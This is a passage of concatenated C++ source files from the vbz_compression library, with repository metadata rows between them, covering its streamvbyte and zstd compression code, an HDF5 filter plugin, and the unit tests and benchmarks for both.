state.SetBytesProcessed(state.iterations() * item_count * integer_size); } template <typename IntType, int ZstdLevel> void vbz_hdf_benchmark_sequence(benchmark::State& state) { vbz_hdf_benchmark<SequenceGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), vbz_filter<true, ZstdLevel>); } template <typename IntType> void vbz_hdf_benchmark_sequence_uncompressed(benchmark::State& state) { vbz_hdf_benchmark<SequenceGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), no_filter); } template <typename IntType> void vbz_hdf_benchmark_sequence_zlib(benchmark::State& state) { vbz_hdf_benchmark<SequenceGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), zlib_filter); } template <typename IntType, int ZstdLevel> void vbz_hdf_benchmark_random(benchmark::State& state) { vbz_hdf_benchmark<SignalGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), vbz_filter<true, ZstdLevel>); } template <typename IntType> void vbz_hdf_benchmark_random_uncompressed(benchmark::State& state) { vbz_hdf_benchmark<SignalGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), no_filter); } template <typename IntType> void vbz_hdf_benchmark_random_zlib(benchmark::State& state) { vbz_hdf_benchmark<SignalGenerator<IntType>>(state, sizeof(IntType), get_h5_type<IntType>(), zlib_filter); } /*BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int8_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int16_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int32_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int8_t, 1); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int16_t, 1); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_sequence, std::int32_t, 1); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_uncompressed, std::int8_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_uncompressed, std::int16_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_uncompressed, std::int32_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_zlib, std::int8_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_zlib, std::int16_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_sequence_zlib, std::int32_t);*/ BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int8_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int16_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int32_t, 0); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int8_t, 1); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int16_t, 1); BENCHMARK_TEMPLATE2(vbz_hdf_benchmark_random, std::int32_t, 1); /* BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_uncompressed, std::int8_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_uncompressed, std::int16_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_uncompressed, std::int32_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_zlib, std::int8_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_zlib, std::int16_t); BENCHMARK_TEMPLATE(vbz_hdf_benchmark_random_zlib, std::int32_t); */ // Run the benchmark BENCHMARK_MAIN();
5,931
C++
.cpp
145
36.57931
127
0.714211
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,147
vbz_hdf_plugin_test.cpp
nanoporetech_vbz_compression/vbz_plugin/test/vbz_hdf_plugin_test.cpp
#include "test_utils.h" #include "hdf_id_helper.h" #include "vbz_plugin.h" #include "vbz_plugin_user_utils.h" #include <hdf5.h> #include <catch2/catch.hpp> #include <array> #include <numeric> #include <random> static bool plugin_init_result = vbz_register(); template <typename T> void run_linear_test(hid_t type, std::size_t count) { (void)plugin_init_result; GIVEN("An empty hdf file and a random data set") { auto file_id = H5Fcreate("./test_file.h5", H5F_ACC_TRUNC, H5P_DEFAULT, H5P_DEFAULT); auto file = IdRef::claim(file_id); // Generate an incrementing sequence of integers std::vector<T> data(count); std::iota(data.begin(), data.end(), 0); WHEN("Inserting filtered data into file") { auto creation_properties = IdRef::claim(H5Pcreate(H5P_DATASET_CREATE)); std::array<hsize_t, 1> chunk_sizes{ { count / 8 } }; H5Pset_chunk(creation_properties.get(), int(chunk_sizes.size()), chunk_sizes.data()); vbz_filter_enable(creation_properties.get(), sizeof(T), true, 5); auto dataset = create_dataset(file_id, "foo", type, data.size(), creation_properties.get()); write_full_dataset(dataset.get(), type, data); THEN("Data is read back correctly") { auto read_data = read_1d_dataset<T>(file_id, "foo", type); CHECK(read_data == data); } } } } template<typename T> struct UniformIntDistribution { using type = std::uniform_int_distribution<T>; }; template<> struct UniformIntDistribution<uint8_t> { // uint8_t isn't a valid parameter for uniform_int_distribution using type = std::uniform_int_distribution<unsigned short>; }; template<> struct UniformIntDistribution<int8_t> { // int8_t isn't a valid parameter for uniform_int_distribution using type = std::uniform_int_distribution<short>; }; template <typename T> void run_random_test(hid_t type, std::size_t count) { GIVEN("An empty hdf file and a random data set") { auto file_id = H5Fcreate("./test_file.h5", H5F_ACC_TRUNC, H5P_DEFAULT, H5P_DEFAULT); auto file = IdRef::claim(file_id); std::vector<T> data(count); std::random_device rd; std::default_random_engine random_engine(rd()); using Distribution = typename UniformIntDistribution<T>::type; Distribution dist(std::numeric_limits<T>::min(), std::numeric_limits<T>::max()); for (auto& elem : data) { elem = T(dist(random_engine)); } WHEN("Inserting filtered data into file") { auto creation_properties = IdRef::claim(H5Pcreate(H5P_DATASET_CREATE)); std::array<hsize_t, 1> chunk_sizes{ { count / 8 } }; H5Pset_chunk(creation_properties.get(), int(chunk_sizes.size()), chunk_sizes.data()); vbz_filter_enable(creation_properties.get(), sizeof(T), true, 1); auto dataset = create_dataset(file_id, "foo", type, data.size(), creation_properties.get()); write_full_dataset(dataset.get(), type, data); THEN("Data is read back correctly") { auto read_data = read_1d_dataset<T>(file_id, "foo", type); CHECK(read_data == data); } } } } SCENARIO("Using zstd filter on a int8 dataset") { run_linear_test<std::int8_t>(H5T_NATIVE_INT8, 100); run_random_test<std::int8_t>(H5T_NATIVE_INT8, 10 * 1000 * 1000); } SCENARIO("Using zstd filter on a int16 dataset") { run_linear_test<std::int16_t>(H5T_NATIVE_INT16, 100); run_random_test<std::int16_t>(H5T_NATIVE_INT16, 10 * 1000 * 1000); } SCENARIO("Using zstd filter on a int32 dataset") { run_linear_test<std::int32_t>(H5T_NATIVE_INT32, 100); run_random_test<std::int32_t>(H5T_NATIVE_INT32, 10 * 1000 * 1000); } SCENARIO("Using zstd filter on a uint8 dataset") { run_linear_test<std::uint8_t>(H5T_NATIVE_UINT8, 100); run_random_test<std::uint8_t>(H5T_NATIVE_UINT8, 10 * 1000 * 1000); } SCENARIO("Using zstd filter on a uint16 dataset") { run_linear_test<std::uint16_t>(H5T_NATIVE_UINT16, 100); run_random_test<std::uint16_t>(H5T_NATIVE_UINT16, 10 * 1000 * 1000); } SCENARIO("Using zstd filter on a uint32 dataset") { run_linear_test<std::uint32_t>(H5T_NATIVE_UINT32, 100); run_random_test<std::uint32_t>(H5T_NATIVE_UINT32, 10 * 1000 * 1000); }
4,479
C++
.cpp
111
33.963964
104
0.642164
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,149
hdf_id_helper.cpp
nanoporetech_vbz_compression/vbz_plugin/hdf_test_utils/hdf_id_helper.cpp
#include "hdf_id_helper.h" #define THROW(_ex) throw _ex #define THROW_ON_ERROR(code) \ if (code < 0) THROW(Exception()) namespace ont { namespace hdf5 { static_assert(std::is_same<Id,hid_t>::value, "Mismatched ID types"); IdRef IdRef::claim(Id id) { if (id < 0 || H5Iis_valid(id) <= 0) { THROW(Exception()); } return IdRef(id); } IdRef IdRef::ref(Id id) { assert(id >= 0); THROW_ON_ERROR(H5Iinc_ref(id)); return IdRef(id); } IdRef IdRef::global_ref(Id id) { assert(id >= 0); // Increment the index here - never decrementing it. THROW_ON_ERROR(H5Iinc_ref(id)); return global(id); } IdRef::IdRef(IdRef const& other) : m_id(other.m_id) , m_is_global_constant(other.m_is_global_constant) { if (!m_is_global_constant && m_id >= 0) { THROW_ON_ERROR(H5Iinc_ref(m_id)); } } IdRef& IdRef::operator=(IdRef const& other) { if (!other.m_is_global_constant && other.m_id >= 0) { THROW_ON_ERROR(H5Iinc_ref(other.m_id)); } if (!m_is_global_constant && m_id >= 0) { auto result = H5Idec_ref(m_id); if (result < 0) { // this will be logged by the auto-logging code // (see install_error_function) assert(false); } } m_is_global_constant = other.m_is_global_constant; m_id = other.m_id; return *this; } IdRef::~IdRef() { if (!m_is_global_constant && m_id >= 0) { auto result = H5Idec_ref(m_id); if (result < 0) { // this will be logged by the auto-logging code // (see install_error_function) assert(false); } } } int IdRef::ref_count() const { if (m_id < 0) { return 0; } return H5Iget_ref(m_id); } }}
1,757
C++
.cpp
70
20.214286
68
0.583881
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,150
vbz.cpp
nanoporetech_vbz_compression/vbz/vbz.cpp
#include "v0/vbz_streamvbyte.h" #include "v1/vbz_streamvbyte.h" #include <gsl/gsl-lite.hpp> #include <zstd.h> #include <cassert> #include <cstddef> #include <iostream> #include <memory> // include last - it uses c headers which can mess things up. #include "vbz.h" namespace { // util for using malloc with unique_ptr struct free_delete { void operator()(void* x) { free(x); } }; gsl::span<char> make_data_buffer(void* data, vbz_size_t size) { return gsl::make_span(static_cast<char*>(data), size); } gsl::span<char const> make_data_buffer(void const* data, vbz_size_t size) { return gsl::make_span(static_cast<char const*>(data), size); } void copy_buffer( gsl::span<char const> source, gsl::span<char> dest) { std::copy(source.begin(), source.end(), dest.begin()); } struct VbzSizedHeader { vbz_size_t original_size; }; } extern "C" { bool vbz_is_error(vbz_size_t result_value) { return result_value >= VBZ_FIRST_ERROR; } char const* vbz_error_string(vbz_size_t error_value) { if (VBZ_ZSTD_ERROR == error_value) return "VBZ_ZSTD_ERROR"; if (VBZ_STREAMVBYTE_INPUT_SIZE_ERROR == error_value) return "VBZ_STREAMVBYTE_INPUT_SIZE_ERROR"; if (VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR == error_value) return "VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR"; if (VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR == error_value) return "VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR"; if (VBZ_STREAMVBYTE_STREAM_ERROR == error_value) return "VBZ_STREAMVBYTE_STREAM_ERROR"; if (VBZ_VERSION_ERROR == error_value) return "VBZ_VERSION_ERROR"; return "VBZ_UNKNOWN_ERROR"; } vbz_size_t vbz_max_compressed_size( vbz_size_t source_size, CompressionOptions const* options) { vbz_size_t max_size = source_size; if (options->integer_size != 0 || options->perform_delta_zig_zag) { auto size_fn = vbz_max_streamvbyte_compressed_size_v0; if (options->vbz_version == 1) { size_fn = vbz_max_streamvbyte_compressed_size_v1; } else if (options->vbz_version != 0) { return VBZ_VERSION_ERROR; } max_size = vbz_size_t(size_fn(options->integer_size, max_size)); if (vbz_is_error(max_size)) { return max_size; } } if (options->zstd_compression_level != 0) { max_size = vbz_size_t(ZSTD_compressBound(max_size)); } // Always include sized header for simplicity. return max_size + sizeof(VbzSizedHeader); } vbz_size_t vbz_compress( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options) { auto current_source = make_data_buffer(source, source_size); auto dest_buffer = make_data_buffer(destination, destination_capacity); if (options->zstd_compression_level == 0 && options->integer_size == 0) { copy_buffer(current_source, dest_buffer); return source_size; } // optional intermediate buffer - allocated if needed later, but stored for // duration of call. std::unique_ptr<void, free_delete> intermediate_storage; if (options->integer_size != 0) { auto size_fn = vbz_max_streamvbyte_compressed_size_v0; if (options->vbz_version == 1) { size_fn = vbz_max_streamvbyte_compressed_size_v1; } else if (options->vbz_version != 0) { return VBZ_VERSION_ERROR; } auto max_stream_v_byte_size = size_fn( options->integer_size, vbz_size_t(current_source.size()) ); if (vbz_is_error(max_stream_v_byte_size)) { return max_stream_v_byte_size; } auto streamvbyte_dest = dest_buffer; if (options->zstd_compression_level != 0) { intermediate_storage.reset(malloc(max_stream_v_byte_size)); streamvbyte_dest = make_data_buffer(intermediate_storage.get(), max_stream_v_byte_size); } else { assert(max_stream_v_byte_size <= destination_capacity); } auto compress_fn = vbz_delta_zig_zag_streamvbyte_compress_v0; if (options->vbz_version == 1) { compress_fn = vbz_delta_zig_zag_streamvbyte_compress_v1; } else if (options->vbz_version != 0) { return VBZ_VERSION_ERROR; } auto compressed_size = compress_fn( current_source.data(), vbz_size_t(current_source.size()), streamvbyte_dest.data(), vbz_size_t(streamvbyte_dest.size()), options->integer_size, options->perform_delta_zig_zag ); current_source = make_data_buffer(streamvbyte_dest.data(), compressed_size); } if (options->zstd_compression_level == 0) { // destination already written to above. return vbz_size_t(current_source.size()); } auto compressed_size = ZSTD_compress( dest_buffer.data(), vbz_size_t(dest_buffer.size()), current_source.data(), vbz_size_t(current_source.size()), options->zstd_compression_level ); if (ZSTD_isError(compressed_size)) { return VBZ_ZSTD_ERROR; } return vbz_size_t(compressed_size); } vbz_size_t vbz_decompress( const void* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, CompressionOptions const* options) { auto current_source = make_data_buffer(source, source_size); auto dest_buffer = make_data_buffer(destination, destination_size); // If nothing is enabled, just do a copy between buffers and return. if (options->zstd_compression_level == 0 && options->integer_size == 0) { copy_buffer(current_source, dest_buffer); return source_size; } // optional intermediate buffer - allocated if needed later, but stored for // duration of call. std::unique_ptr<void, free_delete> intermediate_storage; if (options->zstd_compression_level != 0) { auto max_zstd_decompressed_size = ZSTD_getFrameContentSize(source, source_size); if (ZSTD_isError(max_zstd_decompressed_size)) { return VBZ_ZSTD_ERROR; } auto zstd_dest = dest_buffer; if (options->integer_size != 0) { intermediate_storage.reset(malloc(max_zstd_decompressed_size)); zstd_dest = make_data_buffer(intermediate_storage.get(), (vbz_size_t)max_zstd_decompressed_size); } else { assert(max_zstd_decompressed_size <= destination_size); } auto compressed_size = ZSTD_decompress( zstd_dest.data(), zstd_dest.size(), current_source.data(), current_source.size() ); if (ZSTD_isError(compressed_size)) { return VBZ_ZSTD_ERROR; } current_source = make_data_buffer(zstd_dest.data(), vbz_size_t(compressed_size)); } // if streamvbyte is disabled, return early. if (options->integer_size == 0) { return vbz_size_t(current_source.size()); } auto decompress_fn = vbz_delta_zig_zag_streamvbyte_decompress_v0; if (options->vbz_version == 1) { decompress_fn = vbz_delta_zig_zag_streamvbyte_decompress_v1; } else if (options->vbz_version != 0) { return VBZ_VERSION_ERROR; } return decompress_fn( current_source.data(), vbz_size_t(current_source.size()), dest_buffer.data(), vbz_size_t(dest_buffer.size()), options->integer_size, options->perform_delta_zig_zag ); } vbz_size_t vbz_compress_sized( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options) { auto dest_buffer = make_data_buffer(destination, destination_capacity); // Extract header information auto& dest_header = dest_buffer.subspan(0, sizeof(VbzSizedHeader)).as_span<VbzSizedHeader>()[0]; dest_header.original_size = source_size; // Compress data info remaining dest buffer auto dest_compressed_data = dest_buffer.subspan(sizeof(VbzSizedHeader)); auto compressed_size = vbz_compress( source, source_size, dest_compressed_data.data(), vbz_size_t(dest_compressed_data.size()), options ); return compressed_size + sizeof(VbzSizedHeader); } vbz_size_t vbz_decompress_sized( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options) { auto source_buffer = make_data_buffer(source, source_size); if (source_buffer.size() < sizeof(VbzSizedHeader)) { return VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR; } // Extract header information auto const& source_header = source_buffer.subspan(0, sizeof(VbzSizedHeader)).as_span<VbzSizedHeader const>()[0]; if (destination_capacity < source_header.original_size) { return VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR; } // Compress data info remaining dest buffer auto src_compressed_data = source_buffer.subspan(sizeof(VbzSizedHeader)); return vbz_decompress( src_compressed_data.data(), vbz_size_t(src_compressed_data.size()), destination, source_header.original_size, options ); } vbz_size_t vbz_decompressed_size( void const* source, vbz_size_t source_size, CompressionOptions const* options) { auto source_buffer = make_data_buffer(source, source_size); auto const& source_header = source_buffer.subspan(0, sizeof(VbzSizedHeader)).as_span<VbzSizedHeader const>()[0]; return source_header.original_size; } }
9,944
C++
.cpp
292
27.386986
116
0.647269
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,151
vbz_perf.cpp
nanoporetech_vbz_compression/vbz/perf/vbz_perf.cpp
#include "vbz.h" #include "test_data_generator.h" #include <benchmark/benchmark.h> template <typename VbzOptions, typename Generator> void streamvbyte_compress_benchmark(benchmark::State& state) { std::size_t max_element_count = 0; auto input_value_list = Generator::generate(max_element_count); auto const int_size = sizeof(typename VbzOptions::IntType); CompressionOptions options{ VbzOptions::UseZigZag, int_size, VbzOptions::ZstdLevel, VBZ_DEFAULT_VERSION }; std::vector<char> dest_buffer(vbz_max_compressed_size(vbz_size_t(max_element_count * int_size), &options)); std::size_t item_count = 0; for (auto _ : state) { item_count = 0; for (auto const& input_values : input_value_list) { auto const input_byte_count = input_values.size() * sizeof(input_values[0]); item_count += input_values.size(); dest_buffer.resize(dest_buffer.capacity()); auto bytes_used = vbz_compress( input_values.data(), vbz_size_t(input_byte_count), dest_buffer.data(), vbz_size_t(dest_buffer.size()), &options); benchmark::DoNotOptimize(bytes_used); } } state.SetItemsProcessed(state.iterations() * item_count); state.SetBytesProcessed(state.iterations() * item_count * int_size); } template <typename VbzOptions, typename Generator> void streamvbyte_decompress_benchmark(benchmark::State& state) { std::size_t max_element_count = 0; auto input_value_list = Generator::generate(max_element_count); auto const int_size = sizeof(typename VbzOptions::IntType); CompressionOptions options{ VbzOptions::UseZigZag, int_size, VbzOptions::ZstdLevel }; std::vector<char> compressed_buffer(vbz_max_compressed_size(vbz_size_t(max_element_count * int_size), &options)); std::vector<char> dest_buffer(max_element_count * int_size); std::size_t item_count = 0; for (auto _ : state) { item_count = 0; for (auto const& input_values : input_value_list) { state.PauseTiming(); auto const input_byte_count = input_values.size() * sizeof(input_values[0]); item_count += input_values.size(); compressed_buffer.resize(compressed_buffer.capacity()); dest_buffer.resize(input_byte_count); auto compressed_used_bytes = vbz_compress( input_values.data(), vbz_size_t(input_byte_count), compressed_buffer.data(), vbz_size_t(compressed_buffer.size()), &options ); state.ResumeTiming(); auto bytes_expanded_to = vbz_decompress( compressed_buffer.data(), compressed_used_bytes, dest_buffer.data(), vbz_size_t(dest_buffer.size()), &options ); assert(bytes_expanded_to == input_byte_count); benchmark::DoNotOptimize(bytes_expanded_to); } } state.SetItemsProcessed(state.iterations() * item_count); state.SetBytesProcessed(state.iterations() * item_count * int_size); } template <typename _IntType> struct VbzNoZStd { using IntType = _IntType; static const std::size_t UseZigZag = 1; static const std::size_t ZstdLevel = 0; }; template <typename _IntType> struct VbzZStd { using IntType = _IntType; static const std::size_t UseZigZag = 1; static const std::size_t ZstdLevel = 1; }; template <typename CompressionOptions> void compress_sequence(benchmark::State& state) { streamvbyte_compress_benchmark<CompressionOptions, SequenceGenerator<typename CompressionOptions::IntType>>(state); } template <typename CompressionOptions> void compress_random(benchmark::State& state) { streamvbyte_compress_benchmark<CompressionOptions, SignalGenerator<typename CompressionOptions::IntType>>(state); } template <typename CompressionOptions> void decompress_sequence(benchmark::State& state) { streamvbyte_decompress_benchmark<CompressionOptions, SequenceGenerator<typename CompressionOptions::IntType>>(state); } template <typename CompressionOptions> void decompress_random(benchmark::State& state) { streamvbyte_decompress_benchmark<CompressionOptions, SignalGenerator<typename CompressionOptions::IntType>>(state); } BENCHMARK_TEMPLATE(compress_sequence, VbzZStd<std::int8_t>); BENCHMARK_TEMPLATE(compress_sequence, VbzZStd<std::int16_t>); BENCHMARK_TEMPLATE(compress_sequence, VbzZStd<std::int32_t>); BENCHMARK_TEMPLATE(compress_sequence, VbzNoZStd<std::int8_t>); BENCHMARK_TEMPLATE(compress_sequence, VbzNoZStd<std::int16_t>); BENCHMARK_TEMPLATE(compress_sequence, VbzNoZStd<std::int32_t>); BENCHMARK_TEMPLATE(compress_random, VbzZStd<std::int8_t>); BENCHMARK_TEMPLATE(compress_random, VbzZStd<std::int16_t>); BENCHMARK_TEMPLATE(compress_random, VbzZStd<std::int32_t>); BENCHMARK_TEMPLATE(compress_random, VbzNoZStd<std::int8_t>); BENCHMARK_TEMPLATE(compress_random, VbzNoZStd<std::int16_t>); BENCHMARK_TEMPLATE(compress_random, VbzNoZStd<std::int32_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzZStd<std::int8_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzZStd<std::int16_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzZStd<std::int32_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzNoZStd<std::int8_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzNoZStd<std::int16_t>); BENCHMARK_TEMPLATE(decompress_sequence, VbzNoZStd<std::int32_t>); BENCHMARK_TEMPLATE(decompress_random, VbzZStd<std::int8_t>); BENCHMARK_TEMPLATE(decompress_random, VbzZStd<std::int16_t>); BENCHMARK_TEMPLATE(decompress_random, VbzZStd<std::int32_t>); BENCHMARK_TEMPLATE(decompress_random, VbzNoZStd<std::int8_t>); BENCHMARK_TEMPLATE(decompress_random, VbzNoZStd<std::int16_t>); BENCHMARK_TEMPLATE(decompress_random, VbzNoZStd<std::int32_t>); // Run the benchmark BENCHMARK_MAIN();
6,067
C++
.cpp
143
36.055944
121
0.701024
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,152
vbz_test.cpp
nanoporetech_vbz_compression/vbz/test/vbz_test.cpp
#include <cstddef> #include <iostream> #include <numeric> #include <random> #include "vbz.h" #include "test_utils.h" #include "test_data.h" #include <catch2/catch.hpp> template <typename T> void perform_compression_test( std::vector<T> const& data, CompressionOptions const& options) { auto const input_data_size = vbz_size_t(data.size() * sizeof(data[0])); std::vector<int8_t> dest_buffer(vbz_max_compressed_size(input_data_size, &options)); auto final_byte_count = vbz_compress( data.data(), input_data_size, dest_buffer.data(), vbz_size_t(dest_buffer.size()), &options); REQUIRE(!vbz_is_error(final_byte_count)); dest_buffer.resize(final_byte_count); std::vector<int8_t> decompressed_bytes(input_data_size); auto decompressed_byte_count = vbz_decompress( dest_buffer.data(), vbz_size_t(dest_buffer.size()), decompressed_bytes.data(), vbz_size_t(decompressed_bytes.size()), &options ); REQUIRE(!vbz_is_error(decompressed_byte_count)); decompressed_bytes.resize(decompressed_byte_count); auto decompressed = gsl::make_span(decompressed_bytes).as_span<T>(); //INFO("Original " << dump_explicit<std::int64_t>(data)); //INFO("Decompressed " << dump_explicit<std::int64_t>(decompressed)); CHECK(decompressed == gsl::make_span(data)); } template <typename T> void run_compression_test_suite() { GIVEN("Simple data to compress with no delta-zig-zag") { std::vector<T> simple_data(100); std::iota(simple_data.begin(), simple_data.end(), 0); CompressionOptions simple_options{ false, // no delta zig zag sizeof(T), 1, VBZ_DEFAULT_VERSION }; perform_compression_test(simple_data, simple_options); } GIVEN("Simple data to compress and applying delta zig zag") { std::vector<T> simple_data(100); std::iota(simple_data.begin(), simple_data.end(), 0); CompressionOptions simple_options{ true, sizeof(T), 1, VBZ_DEFAULT_VERSION }; perform_compression_test(simple_data, simple_options); } GIVEN("Simple data to compress with delta-zig-zag and no zstd") { std::vector<T> simple_data(100); std::iota(simple_data.begin(), simple_data.end(), 0); CompressionOptions simple_options{ true, sizeof(T), 0, VBZ_DEFAULT_VERSION }; perform_compression_test(simple_data, simple_options); } GIVEN("Random data to compress") { std::vector<T> random_data(10 * 1000); auto seed = std::random_device()(); INFO("Seed " << seed); std::default_random_engine rand(seed); // std::uniform_int_distribution<std::int8_t> has issues on some platforms - always use 32 bit engine std::uniform_int_distribution<std::int32_t> dist(std::numeric_limits<T>::min(), std::numeric_limits<T>::max()); for (auto& e : random_data) { e = dist(rand); } WHEN("Compressing with no delta zig zag") { CompressionOptions options{ false, sizeof(T), 1, VBZ_DEFAULT_VERSION }; perform_compression_test(random_data, options); } WHEN("Compressing with delta zig zag") { CompressionOptions options{ true, sizeof(T), 0, VBZ_DEFAULT_VERSION }; perform_compression_test(random_data, options); } WHEN("Compressing with zstd and delta zig zag") { CompressionOptions options{ true, sizeof(T), 1, VBZ_DEFAULT_VERSION }; perform_compression_test(random_data, options); } } } struct InputStruct { std::uint32_t size = 100; unsigned char keys[25] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, }; }; SCENARIO("vbz int8 encoding") { run_compression_test_suite<std::int8_t>(); } SCENARIO("vbz int16 encoding") { run_compression_test_suite<std::int16_t>(); } SCENARIO("vbz int32 encoding") { run_compression_test_suite<std::int32_t>(); } SCENARIO("vbz int32 known input data") { GIVEN("A known input data set") { std::vector<std::int32_t> simple_data{ 5, 4, 3, 2, 1 }; WHEN("Compressed without zstd, with delta zig-zag") { CompressionOptions simple_options{ true, sizeof(simple_data[0]), 0, VBZ_DEFAULT_VERSION }; THEN("Data compresses/decompresses as expected") { perform_compression_test(simple_data, simple_options); } AND_WHEN("Checking compressed data") { auto const input_data_size = vbz_size_t(simple_data.size() * sizeof(simple_data[0])); std::vector<int8_t> dest_buffer(vbz_max_compressed_size(input_data_size, &simple_options)); auto final_byte_count = vbz_compress( simple_data.data(), input_data_size, dest_buffer.data(), vbz_size_t(dest_buffer.size()), &simple_options); dest_buffer.resize(final_byte_count); std::vector<int8_t> expected{ 0, 0, 10, 1, 1, 1, 1, }; INFO("Compressed " << dump_explicit<std::int64_t>(dest_buffer)); INFO("Decompressed " << dump_explicit<std::int64_t>(expected)); CHECK(dest_buffer == expected); } } WHEN("Compressed with zstd and delta zig-zag") { CompressionOptions simple_options{ true, sizeof(simple_data[0]), 100, VBZ_DEFAULT_VERSION }; THEN("Data compresses/decompresses as expected") { perform_compression_test(simple_data, simple_options); } AND_WHEN("Checking compressed data") { auto const input_data_size = vbz_size_t(simple_data.size() * sizeof(simple_data[0])); std::vector<int8_t> dest_buffer(vbz_max_compressed_size(input_data_size, &simple_options)); auto final_byte_count = vbz_compress( simple_data.data(), input_data_size, dest_buffer.data(), vbz_size_t(dest_buffer.size()), &simple_options); dest_buffer.resize(final_byte_count); std::vector<int8_t> expected{ 40, -75, 47, -3, 32, 7, 57, 0, 0, 0, 0, 10, 1, 1, 1, 1, }; INFO("Compressed " << dump_explicit<std::int64_t>(dest_buffer)); INFO("Decompressed " << dump_explicit<std::int64_t>(expected)); CHECK(dest_buffer == expected); } } } } SCENARIO("vbz int16 known input large data") { GIVEN("Test data from a realistic dataset") { WHEN("Compressing with zig-zag deltas") { CompressionOptions options{ true, sizeof(test_data[0]), 0, VBZ_DEFAULT_VERSION }; perform_compression_test(test_data, options); } WHEN("Compressing with zstd") { CompressionOptions options{ true, sizeof(test_data[0]), 1, VBZ_DEFAULT_VERSION }; perform_compression_test(test_data, options); } WHEN("Compressing with no options") { CompressionOptions options{ false, 1, 0, VBZ_DEFAULT_VERSION }; perform_compression_test(test_data, options); } } } SCENARIO("vbz sized compression") { GIVEN("A known input data set") { std::vector<std::int32_t> simple_data{ 5, 4, 3, 2, 1 }; WHEN("Compressed without zstd, with delta zig-zag") { CompressionOptions simple_options{ true, sizeof(simple_data[0]), 0, VBZ_DEFAULT_VERSION }; WHEN("Compressing data") { auto const input_data_size = vbz_size_t(simple_data.size() * sizeof(simple_data[0])); std::vector<int8_t> compressed_buffer(vbz_max_compressed_size(input_data_size, &simple_options)); auto final_byte_count = vbz_compress_sized( simple_data.data(), input_data_size, compressed_buffer.data(), vbz_size_t(compressed_buffer.size()), &simple_options); compressed_buffer.resize(final_byte_count); THEN("Data is compressed correctly") { std::vector<int8_t> expected{ 20, 0, 0, 0, 0, 0, 10, 1, 1, 1, 1, }; INFO("Compressed " << dump_explicit<std::int64_t>(compressed_buffer)); INFO("Decompressed " << dump_explicit<std::int64_t>(expected)); CHECK(compressed_buffer == expected); } AND_WHEN("Decompressing data") { std::vector<std::int8_t> dest_buffer( vbz_decompressed_size(compressed_buffer.data(), vbz_size_t(compressed_buffer.size()), &simple_options) ); CHECK(dest_buffer.size() == input_data_size); auto final_byte_count = vbz_decompress_sized( compressed_buffer.data(), vbz_size_t(compressed_buffer.size()), dest_buffer.data(), vbz_size_t(dest_buffer.size()), &simple_options); CHECK(final_byte_count == input_data_size); CHECK(gsl::make_span(dest_buffer).as_span<std::int32_t>() == gsl::make_span(simple_data)); } } } } }
11,092
C++
.cpp
297
24.545455
119
0.528685
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,153
streamvbyte_test.cpp
nanoporetech_vbz_compression/vbz/test/streamvbyte_test.cpp
